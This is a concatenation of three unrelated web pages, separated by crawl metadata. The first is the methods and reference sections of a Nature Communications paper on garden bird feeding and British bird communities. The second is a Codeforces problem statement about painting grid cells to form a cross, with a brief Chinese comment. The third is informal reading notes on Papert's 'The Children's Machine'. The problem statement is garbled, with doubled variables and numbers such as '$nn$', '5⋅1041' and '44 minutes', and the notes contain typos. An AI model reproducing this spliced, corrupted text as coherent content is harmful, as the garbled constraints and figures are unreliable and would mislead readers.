Phylogenetic generalised least squares regression (PGLS) was used to test the relationship between changes in feeder use and national population size (n = 31 species) while accounting for phylogenetic structure. Bird phylogeny was based on a pruned consensus tree produced by majority rules using 100 phylogenetic trees randomly extracted from the avian phylogenies developed by Jetz et al.56 (Supplementary Fig. 5). Within the pruned tree, Eurasian nuthatch (Sitta europaea) was represented by phylogenetically similar white-tailed nuthatch (S. himalyensis)57 and lesser redpoll (Carduelis cabaret) by common redpoll (C. flammea)58 since these species were absent from the global avian tree. Maximum likelihood was used to estimate the PGLS model’s Pagel’s lambda, giving a measure of the phylogenetic covariation between the predictor and response. Pagel’s lambda values of zero indicate that the predictor-response relationship is unrelated to phylogeny, whereas high lambda values indicate a strong similarity in the relationship between closely related species. To ensure that the error associated with each annual index value was accounted for within the final model outcome, we used a bootstrap procedure to produce 95% confidence limits around the PGLS regression line. For each bootstrap sample (n = 1000), new values of feeder use and population index for the beginning and end of the time series were drawn at random from the confidence limits around their original estimates, and then used to recalculate estimates of change. The PGLS model was fitted to each bootstrap sample with lambda set at the value estimated for the original model, then 95% confidence limits were calculated from the set of regression coefficients produced.
PGLS, using the pruned consensus tree and maximum likelihood to estimate Pagel’s lambda, was also used to test for differences in population trends between feeder-users and non-feeder users. Here, we used the 1994-2012 habitat-specific trends from Sullivan et al.31 for all breeding birds that are associated with urban areas of Britian and therefore have frequent access to garden bird feeders. These trends were available for 72 species, 33 (46%) of which had been defined as feeder-users. Feeder-users without trends were either winter migrants or did not have suitable data for population estimation. We aggregated the trends for 12 individual habitats to derive two broader trends of interest, urban and non-urban. More specifically, urban trends were estimated using a weighted average of the trends for suburban/urban settlements and rural settlements, accounting for their habitat availability. Non-urban trends were estimated using an weighted average of the trends from all other habitat types (deciduous woodland, mixed woodland, coniferous woodland, upland semi-natural open habitats, lowland semi-natural open habitats, arable farmland, pasture, mixed farming, wetlands and flowing water), accounting for their availability31.
To account for temporal auto-correlation, all trend analyses (described above) included an AR(1) correlation structure. The AR(1) correlation structure was found to be optimal for time series modelling across the different response variables, based on the comparison of models with and without different autocorrelation structures (AR1 or AR2) using AIC and the examination of auto-correlation plots for the model residuals. There was no evidence of spatial autocorrelation in bird community indices across gardens within years, according to spline correlograms fitted to the raw data using the ncf R package59. When using GAM(M)s to investigate non-linear temporal trends, year was always fitted in the form of a thin-plate regression spine with a maximum of five degrees of freedom and the gamma parameter was fixed at 1.4 to reduce over-fitting. Generalised least squares (GLS, national-scale data) and linear mixed models (LMM, garden-scale data) were used to determine the significance of linear temporal trends when GAM(M)s fitted to the same data did not indicate non-linearity (e.g. the smoothed trend had one degree of freedom, was not significant, or did not deviate enough from the linear trend to be deemed ecologically meaningful). Significance was determined using maximum likelihood, Wald statistics, χ2 and F-tests as appropriate with alpha set at 0.0560. To identify periods of significant change within non-linear trends, where the rate of change (the slope) was distinguishable from zero given the uncertainty of the model, we estimated the first derivatives of the GAM temporal smooth61,62. A significant change was assumed where the 95% confidence intervals of the first derivatives excluded zero61. All analyses were performed using R version 3.4.363. Trend analyses used the packages mgcv64 and nlme65, and phylogenetic comparative analyses used APE66, phytools67 and caper68.
The Garden Bird Feeding Survey data and the bird feeding industry data that support the findings of this study are available upon reasonable request from the British Trust for Ornithology, https://www.bto.org/research-data-services. The UKCP09 temperature data used are available under licence from the British Met Office, https://www.metoffice.gov.uk/climate. The avian phylogeny data used are publicly available from BirdTree.org, https://www.BirdTree.org.
Newton, I. Population Limitations in Birds. (Academic Press, London, 1998).
Siriwardena, G. M., Baillie, S. R. & Wilson, J. D. Temporal variation in the annual survival rates of six granivorous birds with contrasting population trends. Ibis 141, 621–636 (1999).
Siriwardena, G. M. et al. The effect of supplementary winter seed food on breeding populations of farmland birds: evidence from two large-scale experiments. J. Appl Ecol. 44, 920–932 (2007).
Baker, D. J., Freeman, S. N., Grice, P. V. & Siriwardena, G. M. Landscape-scale responses of birds to agri-environment management: a test of the English Environmental Stewardship scheme. J. Appl Ecol. 49, 871–882 (2012).
Jones, D. The Birds at My Table: Why We Feed Wild Birds and Why It Matters (Cornell University Press, Ithaca, USA, 2018).
Oro, D., Genovart, M., Tavecchia, G., Fowler, M. S. & Martínez‐Abraín, A. Ecological and evolutionary implications of food subsidies from humans. Ecol. Lett. 16, 1501–1514 (2013).
Orros, M. E. & Fellowes, M. D. Wild bird feeding in a large UK urban area: characteristics and estimates of energy input and individuals supported. Acta Ornithol. 50, 43–58 (2015).
Callahan, D. A history of birdwatching in 100 objects. (Bloomsbury Publishing, London, UK, 2014).
Francis, M. L. et al. Effects of supplementary feeding on interspecific dominance hierarchies in garden birds. PLoS ONE 13, e0202152 (2018).
Galbraith, J. A., Jones, D. N., Beggs, J. R., Parry, K. & Stanley, M. C. Urban bird feeders dominated by a few species and individuals. Front Ecol. Evol. 5, 81 (2017).
Fuller, R. A., Warren, P. H., Armsworth, P. R., Barbosa, O. & Gaston, K. J. Garden bird feeding predicts the structure of urban avian assemblages. Divers Distrib. 14, 131–137 (2008).
Galbraith, J. A., Beggs, J. R., Jones, D. N. & Stanley, M. C. Supplementary feeding restructures urban bird communities. PNAS 112, E2648–E2657 (2015).
Wilcoxen, T. E. et al. Effects of bird-feeding activities on the health of wild birds. Conserv Physiol. 3, cov058 (2015).
Robb, G. N., McDonald, R. A., Chamberlain, D. E. & Bearhop, S. Food for thought: supplementary feeding as a driver of ecological change in avian populations. Front Ecol. Environ. 6, 476–484 (2008).
Loram, A., Tratalos, J., Warren, P. H. & Gaston, K. J. Urban domestic gardens (X): the extent & structure of the resource in five major cities. Land. Ecol. 22, 601–615 (2007).
Gregory, R. D. & Baillie, S. R. Large-scale habitat use of some declining British birds. J. Appl Ecol. 35, 785–799 (1998).
Bland, R. L., Tully, J. & Greenwood, J. J. D. Birds breeding in British gardens: an underestimated population? Bird. Study 51, 97–106 (2004).
Chamberlain, D. E. et al. Annual and seasonal trends in the use of garden feeders by birds in winter. Ibis 147, 563–575 (2005).
Davies, Z. G., Fuller, R. A., Dallimer, M., Loram, A. & Gaston, K. J. Household factors influencing participation in bird feeding activity: a national scale analysis. PLoS ONE 7, e39692 (2012).
The Royal Society for the Protection of Birds. Annual Review 2007-2008 (Bedfordshire, UK, 2008).
Schultz, R. L. & Wittink, D. R. The measurement of industry advertising effects. J. Mark. Res 13, 71–75 (1976).
British Ornithologists’ Union (BOU). The British List: a checklist of birds of britain, 8th edn. Ibis 155, 635–676 (2013).
Gillings, S., Balmer, D. E. & Fuller, R. J. Directionality of recent bird distribution shifts and climate change in Great Britain. Glob. Change Biol. 21, 2155–2168 (2014).
Balmer, D. E. et al. Bird Atlas 2007-2011: The Breeding and Wintering Birds of Britain and Ireland. (British Trust for Ornithology, Thetford, UK, 2013).
Lack, P. The Atlas of Wintering Birds in Britain and Ireland (T & AD Poyser, London, UK, 1986).
Davey, C. M., Chamberlain, D. E., Newson, S. E., Noble, D. G. & Johnston, A. Rise of the generalists: evidence for climate driven homogenization in avian communities. Glob. Ecol. Biogeogr. 21, 568–578 (2011).
Harrison, P. J. et al. Quantifying turnover in biodiversity of British breeding birds. J. Appl Ecol. 53, 469–478 (2015).
Chamberlain, D. E., Cannon, A. R. & Toms, M. P. Associations of garden birds with gradients in garden habitat and local habitat. Ecography 27, 589–600 (2004).
Miller, E. T. et al. Fighting over food unites the birds of North America in a continental dominance hierarchy. Behav. Ecol. 28, 1454–1463 (2017).
Massimino, D. et al. BirdTrends 2017: Trends in Numbers, Breeding Success and Survival for UK Breeding Birds. Research Report 704. (BTO, Thetford, UK, 2017).
Sullivan, M. J. P., Newson, S. E. & Pearce-Higgins, J. W. Using habitat-specific population trends to evaluate the consistency of the effect of species traits on bird population change. Biol. Conserv 192, 343–352 (2015).
Marzluff, J. M. A decadal review of urban ornithology and a prospectus for the future. Ibis 159, 1–13 (2017).
Fretwell, S. D. On territorial behavior and other factors influencing habitat distribution in birds. Acta Bioth 19, 45–52 (1969).
Cox, D. T. C. & Gaston, K. J. Urban bird feeding: Connecting people with nature. PLoS ONE 11, e0158717 (2016).
Cox, D. T. C. & Gaston, K. J. Human–nature interactions and the consequences and drivers of provisioning wildlife. Philos. Trans. R Soc Lond. B Biol. Sci. 373, 20170092 (2018).
Jones, D. N. An appetite for connection: why we need to understand the effect and value of feeding wild birds. Emu 111, i–vii (2011).
Galbraith, J. A. et al. Risks and drivers of wild bird feeding in urban areas of New Zealand. Biol. Conserv 180, 64–74 (2014).
Plummer, K. E., Siriwardena, G. M., Conway, G. J., Risely, K. & Toms, M. P. Is supplementary feeding in gardens a driver of evolutionary change in a migratory bird species? Glob. Change Biol. 21, 4353–4363 (2015).
Orros, M. E. & Fellowes, M. D. E. Widespread supplementary feeding in domestic gardens explains the return of reintroduced Red Kites Milvus milvus to an urban area. Ibis 157, 230–238 (2015).
Cox, D. T. C. & Gaston, K. J. Likeability of garden birds: Importance of species knowledge & richness in connecting people to nature. PLoS ONE 10, e0141505 (2015).
Cox, D. T. C. et al. Covariation in urban birds providing cultural services or disservices and people. J. Appl Ecol. 55, 2308–2319 (2018).
Goddard, M. A., Dougill, A. J. & Benton, T. G. Scaling up from gardens: biodiversity conservation in urban environments. Trends Ecol. Evol. 25, 90–98 (2010).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Effects of winter food provisioning on the phenotypes of breeding blue tits. Ecol. Evol. 8, 5059–5068 (2018).
Robb, G. N. et al. Winter feeding of birds increases productivity in the subsequent breeding season. Biol. Lett. 4, 220–223 (2008).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Fat provisioning in winter impairs egg production during the following spring: a landscape-scale study of blue tits. J. Anim. Ecol. 82, 673–682 (2013).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Winter food provisioning reduces future breeding performance in a wild bird. Sci. Rep. 3, 2002 (2013).
Lawson, B. et al. Health hazards to wild birds and risk factors associated with anthropogenic food provisioning. Philos. Trans. R Soc. Lond. B Biol. Sci. 373, 20170091 (2018).
Fischer, J. D. & Miller, J. R. Direct and indirect effects of anthropogenic bird food on population dynamics of a songbird. Acta Oecol 69, 46–51 (2015).
The Royal Society for the Protection of Birds. Annual Review 2016-2017 (Bedfordshire, UK, 2017).
Newson, S. E. et al. Long-term changes in the migration phenology of UK breeding birds detected by large-scale citizen science recording schemes. Ibis 158, 481–495 (2016).
Magurran, A. E. Measuring Biological Diversity (Blackwell Publishing, Oxford, UK, 2004).
Fuller, R., Groom, G. & Jones, A. The land-cover map of great Britain: an automated classification of landsat thematic mapper data. Photo. Eng. Remote Sens. 60, 553–562 (1994).
Murphy, J. M. et al. UK Climate Projections Science Report: Climate Change Projections (Meteorological Office Hadley Centre, Exeter, UK, 2009).
Gotelli, N. J. & Colwell, R. K. Quantifying biodiversity: procedures and pitfalls in the measurement and comparison of species richness. Ecol. Lett. 4, 379–391 (2001).
Gelman, A. Scaling regression inputs by dividing by two standard deviations. Stat. Med 27, 2865–2873 (2008).
Jetz, W., Thomas, G. H., Joy, J. B., Hartmann, K. & Mooers, A. O. The global diversity of birds in space and time. Nature 491, 444–448 (2012).
Pasquet, E. Phylogeny of the nuthatches of the Sitta canadensis group and its evolutionary and biogeographic implications. Ibis 140, 150–156 (1998).
Knox, A. G., Helbig, A. J., Parkin, D. T. & Sangster, G. The taxonomic status of Lesser Redpoll. Br. Birds 94, 260–267 (2001).
Bjørnstad, O. ncf: spatial nonparametric covariance functions. R package version 1.1-7. https://CRAN.R-project.org/package=ncf (2016).
Bolker, B. M. et al. Generalized linear mixed models: a practical guide for ecology and evolution. Trends Ecol. Evol. 24, 127–135 (2009).
Monteith, D. T., Evans, C. D., Henrys, P. A., Simpson, G. L. & Malcolm, I. A. Trends in the hydrochemistry of acid-sensitive surface waters in the UK 1988–2008. Ecol. Indic. 37, 287–303 (2014).
Harrison, P. J. et al. Assessing trends in biodiversity over space and time using the example of British breeding birds. J. Appl Ecol. 51, 1650–1660 (2014).
R Core Team. R: A language and environment for statistical computing (R Foundation for Statistical Computing, Vienna, Austria, 2017).
Wood, S. mgcv: mixed GAM computation vehicle with GCV/AIC/REML smoothness estimation. R package version 1.8-23. https://CRAN.R-project.org/package=mgcv (2016).
Pinheiro, J., Bates, D., DebRoy, S., Sarkar, D. & Team, R. C. nlme: Linear and Nonlinear Mixed Effects Models. R package version 3.1-131. https://CRAN.R-project.org/package=nlme (2017).
Paradis, E., Claude, J. & Strimmer, K. APE: analyses of phylogenetics and evolution in R language. R package version 5.1. Bioinformatics 20, (289–290 (2004).
Revell, L. J. phytools: an R package for phylogenetic comparative biology (and other things). R package version 0.6.44. Methods Ecol. Evol. 3, 217–223 (2012).
Orme, D. et al. caper: Comparative Analyses of Phylogenetics and Evolution in R. R package version 1.0.1. https://CRAN.R-project.org/package=caper (2018).
We thank all the amateur ornithologists who have contributed to the collection of bird data; the past and present GBFS administrative team, particularly A. Prior, and C. Simm for overseeing the survey; K.W. Smith and L. Smith for discussions about and help with collecting the bird food industry data; D. Massimino for sharing the CBC/BBS bird trend annual indices; S. Gillings for help with examining bird spatial range shifts; J.W. Pearce-Higgins, S. Bearhop and K. Metcalfe for comments and suggestions on previous versions of the manuscript. This paper is the product of an institutional fellowship award (to K.E.P.), made possible thanks to a generous legacy donation to the BTO from Maxwell Hoggett.
The authors declare no competing interests.
Journal peer review information: Nature Communications thanks the anonymous reviewers for their contribution to the peer review of this work. Peer reviewer reports are available.
Publisher’s note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/.
About this article
Cite this article
Plummer, K.E., Risely, K., Toms, M.P. et al. The composition of British bird communities is associated with long-term garden bird feeding. Nat Commun 10, 2088 (2019). https://doi.org/10.1038/s41467-019-10111-5
This article is cited by
Responses of avian assemblages to spatiotemporal landscape dynamics in urban ecosystems
Landscape Ecology (2023)
Drivers of avian habitat use and detection of backyard birds in the Pacific Northwest during COVID-19 pandemic lockdowns
Scientific Reports (2022)
Habitat-use influences severe disease-mediated population declines in two of the most common garden bird species in Great Britain
Scientific Reports (2022)
Differential response of migratory guilds of birds to park area and urbanization
Urban Ecosystems (2022)
Which birds are Brazilians seeing on urban and non-urban feeders? An analysis based on a collective online birding
Ornithology Research (2022)
By submitting a comment you agree to abide by our Terms and Community Guidelines. If you find something abusive or that does not comply with our terms or guidelines please flag it as inappropriate. | <urn:uuid:7eaa7da0-7aca-41bd-9135-e467554cebdd> | CC-MAIN-2023-14 | https://www.nature.com/articles/s41467-019-10111-5?error=cookies_not_supported&code=f2e2214c-49a5-4d2a-b9e7-b2a123294a4c | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945030.59/warc/CC-MAIN-20230323065609-20230323095609-00401.warc.gz | en | 0.909715 | 11,708 | 4.0625 | 4 |
Educational Codeforces Round 68 B Yet Another Crosses Problem
memory limit per test : 256 megabytes
input : standard input
output : standard output
You are given a picture consisting of $nn$ rows and $m$ columns. Rows are numbered from $1$ to $n$ from the top to the bottom, columns are numbered from $1$ to $m$ from the left to the right. Each cell is painted either black or white.
You think that this picture is not interesting enough. You consider a picture to be interesting if there is at least one cross in it. A cross is represented by a pair of numbers $x$ and $y$ , where $1≤x≤n$ and $1≤y≤m$, such that all cells in row $x$ and all cells in column $y$ are painted black.
For examples, each of these pictures contain crosses:
The fourth picture contains 4 crosses: at $(1,3)$ , (1,5)(1,5), $(3,3)$ and $(3,5)$ .
Following images don’t contain crosses:
You have a brush and a can of black paint, so you can make this picture interesting. Each minute you may choose a white cell and paint it black.
What is the minimum number of minutes you have to spend so the resulting picture contains at least one cross?
You are also asked to answer multiple independent queries.
The first line contains an integer $q$ (1≤q≤5⋅1041≤q≤5⋅104) — the number of queries.
The first line of each query contains two integers $nn$ and $m$ (1≤n,m≤5⋅1041≤n,m≤5⋅104, n⋅m≤4⋅105n⋅m≤4⋅105) — the number of rows and the number of columns in the picture.
Each of the next $nn$ lines contains $m$ characters — ‘.’ if the cell is painted white and ‘*’ if the cell is painted black.
It is guaranteed that $\sum n\le5\times10^4, \sum n\times m \le 4 \times 10^5$.
Print $q$ lines, the $i$-th line should contain a single integer — the answer to the $i$-th query, which is the minimum number of minutes you have to spend so the resulting picture contains at least one cross.
The example contains all the pictures from above in the same order.
The first 5 pictures already contain a cross, thus you don’t have to paint anything.
You can paint $(1,3)$ , $(3,1)$ , $(5,3)$ and $(3,5)$ on the 66-th picture to get a cross in $(3,3)$ . That’ll take you 44 minutes.
You can paint $ (1,2)$ on the $7$-th picture to get a cross in $(4,2)$ .
You can paint $(2,2)$ on the 88-th picture to get a cross in $(2,2)$. You can, for example, paint $(1,3)$ , $(3,1)$ and $(3,3)$ to get a cross in $(3,3)$ but that will take you 33 minutes instead of $1$ .
There are 9 possible crosses you can get in minimum time on the 99-th picture. One of them is in $ (1,1)$ : paint $ (1,2)$ and $(2,1)$ .
对我来说毒瘤题目啊,B 题,难受。一开始用的暴力的方法,wa 在了 2,一直找不到自己错在了哪里。眼看着别人一个一个过了这题,自己还一直卡在这,真的难受。几乎卡了整场比赛,最后没有时间看 D 题,赛后几乎秒出了D题。诶,还是太菜了,如果不卡这题的话应该能上很多分。
分别统计出每行每组 ‘.’ 的数量,最后遍历每个符号,用
r[i] + r[j] - (maze[i][j] == '.') 来更新最小值。 | <urn:uuid:94fc34c8-bc48-440b-a3ad-a758eb35f74a> | CC-MAIN-2023-14 | http://zhiyi.live/2019/07/21/Educational-Codeforces-Round-68-B-Yet-Another-Crosses-Problem/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00601.warc.gz | en | 0.784393 | 1,203 | 2.9375 | 3 |
These are some unfinished notes that I have taken while reading the Children’s Machine by Seymour Papert. Hope that someday I will weave them into something more fluid.
Why, though a period when so much human activity has been
revolutionized, have we not seen comparable change in the way we
help our children learn?
One could indeed make kitchen math part of the School by making School part of the kitchen.
Are there any snakes in the house?
Yes there are, there are zero snakes in the house!
So. negative numbers are numbers too, and their reality grows in the course of playing with turtle.
You can’t retire from a good project simply because it has succeeded.
Constructionism: It does not call in question the value of instruction as such
The kind of knowledge that children most need is the knowledge that will help them get more knowledge.
If the children really want to learn something, and have the opportunity to learn it in its use, they do so even if the teaching is poor.
Constructionism looks more closely than other educational -isms at the idea of mental construction. It attaches a special importance to role of constructions in the world as a support for those in the head, thereby becoming less of a purely mentalistic doctrine. It also takes the idea of constructing in the head more seriously by recognizing more than one kind of construction and by asking questions about the methods and materials used.
How can one become expert in constructing knowledge?
What skills are required?
Are these skills different for different kinds of knowledge?
School math, like the ideology, though not necessarily the practice, of modern science, is based on the idea of generality – the single, universally correct method that will work for all problems and for all people.
Use what you’ve got, improvise, make do.
The natural context for learning would be through particiaption in other activities other than math itself.
The reason is that the educators who advocate imposing abstract ways of thinking on students almost practice what they preach – as I tried to do in adopting a concrete style of writing – but with very different effects.
But however concrete their data, any statistical question about “the effect” of “the computer” is irretrievably abstract. This is because all such studies depend on use of what is known as the “scientific method,” in form of experiments designed to study the effect of one factor which is varied while taking great pains to
keep everything else same. … But nothing could be more absurd than an experiment in which computers are placed in a classroom where nothing else has changed. The entire point of all the examples I have given is that the computers serve best when they allow everything to change.
The concept of highly rigorous and formal scientific method that most of us have been taught in school is really an ideology proclaimed in books, taught in schools and argued by philosophers but widely ignored in actual practice of science.
They count the same, but it’s more eggs.
My overarching message to anyone who wishes to influence, or simple understand, the development of educational computing is that it is not about one damn product after another (to paraphrase a saying
about how school teaches history). Its essence is the growth of a culture, and it can be influenced constructively only through understanding and fostering trends in this culture.
I would be rather precisely wrong than vaguely right.
– Patrick Suppes
It had been obvious to me for a long time that one of the major difficulties in school subjects such as mathematics and science is that School insists on the student being precisely right. Surely it is necessary in some situations to be precisely right. But these situations cannot be the right ones for developing the kind of thinking that I most treasure myself and many creative people I know.
What computers had offered me was exactly what they should offer children! They should serve children as instruments to work with and to think with, as means to carry out projects, the source of concepts to think new ideas. The last thing in the world I wanted or needed was a drill and practice program telling me to do this sum of spell that word! Why should we impose such a thing on children?
The opportunity for fantasy opens the to a feeling of intimacy
with the work and provides a peep at how emotional side of
children’s relationship with science and technology could be very
different from what is traditional in School. Fantasy has always
been encouraged in good creative writing and art
classes. Excluding it from science is a foolish neglect of an
opportunity to develop bonding between children and science.
Errors can become sources of information.
Although the ultimate goal was the same, the means were more than
just qualitatively different; they were episte,mologically
different in that they used a different way of thinking.
Traditional epistemology is an epistemology of precision:
Knowledge is valued for being precise and considered inferior if
it lacks precision. Cybernetics creates an epistemology of
The real problem was that I was still thinking in terms of how to
“get the children to do something.” This is the educator’s
instinctive way of thinking: How can you get children to like
math, to write wonderfully, to enjoy programming, to use
higher-order thinking skills? It took a long time for me to
understand in my gut, even after I was going around saying it,
that Logo gaphics was successful because of the powet it /gave/ to
children, not because of the performance it /got from/ them.
Children love constructing things, so let’s choose a construction
set and add to it whatever is needed for these to make cybernetic
What will they [children] learn from it [Logo]? And won’t it favor
boys over girls?
The first question concerns what piece of the school curriculum is
being learned but I attach the most importance to such issues as
children’s relationship with technology, then idea of learning,
their sense of self. As for the gender issue, I am thinking more
about, how in the long run comoutational activities will affect
gender than how the gener will affect the activities.
Their work provies good examples of material that overlaps with
School science and math, and of an alternative style applied to
these subjects – ins
tead of formal style that uses rules, a
concrete style that uses objects.
It is worth noting that the students appreciated the
self-organizing nature of the traffic jam only because they had
written the programs themselves. Had they been using a packaged
simulation, they would have had no way of knowing the elegant
simplicity of the programs underlying the jam.
Emergent stuctures often behave very differently than the elements
that compose them.
The cathedral model of education applies the same principle to
building knowledge structures. The curriculum designer in cast in
the role of a “knowledge architect” who will specify a plan, a
tight progra, for the placement of “knowledge brick’s” in
What is typical of emergently programmed systems is that
deviations from what was expected do not cause the wholw to
collapse but provoke adaptive responses.
We are living with an edicational systsem that is fundamentally as
irrational as the command economy and ultimately for the same
reason. It does not have capacity for local adaptation that is
necessary for a complex system even to function effieciently in a
changing environment, and is doubly necessary for such a system to
be able to evolve.
Defininf educational success by test scores is not very different
from couting nails made rather than nails used.
But calling hierarchy into question is the crux of the problem if
Each of these cases suggests ways in which a little school created
in a militant spirit can mobilize technology as an assertion of
I could continue in this spirit, but this may be enough to make
the point that little schools could give themselves a deeper and
more conscious specific identity. Everything I have said in this
book converges to suggest that this would produce rich
intellectual environments in which not only children and teachers
but also new ideas about learning would develop together.
I see little schools as the most powerful, perhaps an essential,
route to generating variety for the evolution of education.
The prevailing wisdom in the education establishment might agree
with the need for variety but look to other sources to provide
it. For example, many – let us call them the Rigorous
Researchers – would say that the proper place for both variation
and selection is in the laboratory. On their model, researchers
should develop large numbers of different ideas, test them
rigorously, select the best, and disseminate them to schools.
In my view this is simply Gosplan in disguise.
The importance of the concept of the little school is that it
provides a powerful, perhaps by far the most powerful, strategy to
allow the operation of the principle of variation and selection.
This objection depends on an assumption that is at the core of the
technicalist model of education: Certain procedures are the best,
and the people involved can be ordered to carry them out. But even
if there were such a thing as “the best method” for learning, it
would still only be the best, or even mildly good, if people
believed in it. The bueracrat thinks that you can make people
beleive in something by issuing orders.
The design of learning environment has to take account of the
cultural environment as well, anad its implementation must make
serious effort at involvement of the communities in which it is to
It is no longer necessary to bring a thousand children together in
one building and under one administration in order to develop a
sense of community.
I do not see that School can be defended in its social role. It
does not serve the functions it claims, and will do so less and
Talking about megachange feels to them like fiddling when Rome
burns. Education today is faced with immediate, urgent
problems. Tell us how to use your computer to solve some of the
many immediate practical problems we have, they say.
Impediments to change in education such as, cost, politics, the
immense power of the vested interests of school bureaucrats, or lack
of scientific research on new forms of learning.
Large number of teachers manage to create within the walls of their
own classrooms oases of learning profoundly at odds with the
education philosophy espoused by their administrators…
But despite the many manifestations of a widespread desire for
something different, the education establishment, including most of
its research community, remains largely committed to the educational
philosophy of the late nineteenth and early twentieth centuries, and
so far none of those who challenge these have hallowed traditions
has been able to loosen the hold of the educational establishement
on how children are taught.
Do children like games more than homework because, the later is
harder than the former?
Most [games] are hard, with complex information – as well as
techniques – to be mastered, in the information often much more
difficult and time consuming to master than the technique.
These toys, by empowering children to test out ideas about working
within prefixed rules and structures in a way few other toys are
capable of doing, have proved capable of teaching students about the
possibilities and drawbacks of a newly presented system in ways many
adults should envy.
In trying to teach children what adults want them to know, does
School utitlize the way human beings most naturally learn in
If it has so long been so desperately needed, why have previous
calls for it not caught fire?
Is reading the principal access route to knowledge?
Ask a symapathetic adult who would reward her curiosity with praise.
Literacy is being able to read and write. Illiteracy can be
remedied by teaching children the mechanical skill of decoding black
marks on white paper.
/Letteracy/ and /Letterate/
Reading from Word to Reading from World
… the Knowledge Machine offers children a transition between
preschool learning and true literacy in way that is more personal,
more negotiational, more gradual, and so less precarious thant the
abrupt transition we now ask chidlrento malke as they move from
learning through direct experience to using the orinted word as a
source of important information.
…. School’s way is the only way beacause they have never seen or
imagined convincing alternatives in the ability to impart certain
kinds of knowledge.
* Babies learn to talk without curriculum or formal lessson
develop hobbies at skills without teachers
* social behavior is picked up other than through classroom
Parable of the Automobile:
… certain problems that had been abstract and hard to grasp
became concrete and transparent, and certain projects that had
seemed interesting but too complex to undertake became
Paulo Freire: “Banking model” information is deposited in
child’s mind like money in a savings account.
/Tools/ for creating new experiments in effective fashion.
* Dewey: children would learn better if learning were truly a
part of living experience
* Freire: chidlren would learn better if they were truly in
charge of their own learning processes
* Piaget: intelligence emerges from an evolutionary process in
which many factors must have time to find their equilibrium.
* Vygotsky: Conversation plays a crucial role in learning.
Why did the discovery method fail?
By closing off a much larger basis of knowledge that should
serve as a foundation for formal mathematics taught in school
and perhas a minimal intuitive basis directly connected with
The central problem of mathematics education is to find ways
to draw on the child’s vast experience of oral
mathematics. Computers can do this.
Giving chidlren opportunity learn and use mathematics in a
nonformalized way of knowing encourages rather than inhibits
the eventual adoption of formalized way, just as the XO,
rather than discouraging reading, would eventually stimulate
children to read.
The design process is not used to learn more formal geometry.
Traditionally teh art and writing classes are for fantasy but
science deals with facts; union of technology with biology.
It allows them to enter science through a region where
scientific thinking is most like there own thinking.
Reading biographies and iterrogating friends has convinced me
that all successful learners find ways to take charge of their
early lives sufficiently to develop a sense of intellectual
Piaget’s first article: a paradox?
Schools have inherent tendency to infantilize the children by
placing them in a position of have to do so as they are told,
to occupy themselves with work dictated by someone else and
that, morever, has no intrinsic value – school work is done only
because the designer of the curriculum decided that doingthis
work would shape the doer into a desirable form[for the
NatGeo: Kidnet??Robert Tinker
Researchers, following the so-called scientific method of
using controlled experiments, solemnly expose the children to
a “treatment” of some sort and then look at measurable
results. But this flies in the face of all common knowledge
of how human beings develop.
The method of controlled experimentation that evaluates an
idea by implementing it, taking care to keep everything else
the same, and measuring the result, may be an appropriate way
to evaluate the effects of a small modification. However, it
can tell us nothing about ideas that might lead to deep
change… It will be steered less by the outcome of tests and
measurements than by its participant’ intuitive understanding.
The prevalent literal-minded, “what you see is what you get”
approach measuring the effectiveness of computers in learning
by teh achievements in present-day classroons makes it certain
that tomorrow will always be prisoner of yesterday.
Example of Jet attached to horse wagon.
… most people are more interested in what they learn than in how
the learning happens.
But math is not about feeling the relationship of your body to
Turtle lets you do this!
Intellectual work is adult child’s play.
Example that if observation of schools in some country where
only one writing instrument could be provided for every fifty
students suggested that writing does not significantly help
The change requires a much longer and more social computer
experience than is possible with two machines at the back of
/Balkanized Curriculum and impersonal rote learning/
What had started as a subversive instrument of change was
neutralized by the system and converted into an instrument of
Schools will not come to use computers “properly” because
researchers tell it how to do so.’
It is characteristic of a conservative systems that
acoomodation will come only when the opportunities of
assimilation have been exhausted.
* Immediate Feedback
* Individualized instruction
* Neutrality *
CAI will often modestly raise test scores, especially at the low end
of the scale. But it does without questioning the structure or the
educational goals of the traditional School.
Today, because it is the 15th Monday of your 5th grade year,
you have to do this sum irrespective of who you are or what
you really want to do; do what you are told and do it the
way you are told to do it.
Piaget was the theorist of learning without curriculum;
School spawned the projectof developing a Piagetian curriculum.
The central issue of change in education is the tension
between technicalizing and not technicalizing, and here the teacher
occupies the fulcrum position.
Shaw: He who can, does; he who cannot, teaches.
The system defeats its own purpose in attempt to enforce them.
School has evolved a heirarchical system of control that
sets narrow limits within which the actors – administators
as well as teachers – are allowed to exercise a degree of
Hierarchy vs. Heterarchy
The major obstacle in the way of teachers becoming learners
is inhibition about learning.
The problem with `developed’ countries as opposed to `developing’ ones
is that the developed countries are already there, there is no further
In education, the highest mark of success is not having imitators but
inspiring others to do something else.
As long as there is afixed curriculum, a teacher has no need to become
in the question what is and what is not mathematics.
Society cannot afford to keep back its potentially best teachers
simply because some. or even most, are unwilling.
The how-to-do-it literature in the constructivist subculture is almost
as strongly biased to the teacher side as it is in the instructionist
/Mathematikos/ disposed to learn
/mathema/ a lesson
/manthanein/ to learn
\ldots mathetics is to learning what heuristics is to problem solving.
What is that feeling when you look at a familiar object, with a sense
that you are looking at the object for the first time?
It is /jamais vu/.
Attempts by teachers and textbook authors to connect school fractions
with real life via representations as pies simply reuslyed in a new
* What is the difference in learning at school and all other learning?
Generally in life, knowledge is acquired to be used. But school
learning more often fits Freire’s apt metaphor: Knowledge is treated
like money, to be put away in a bank for the future.
* What does /Computer Literacy/ mean?
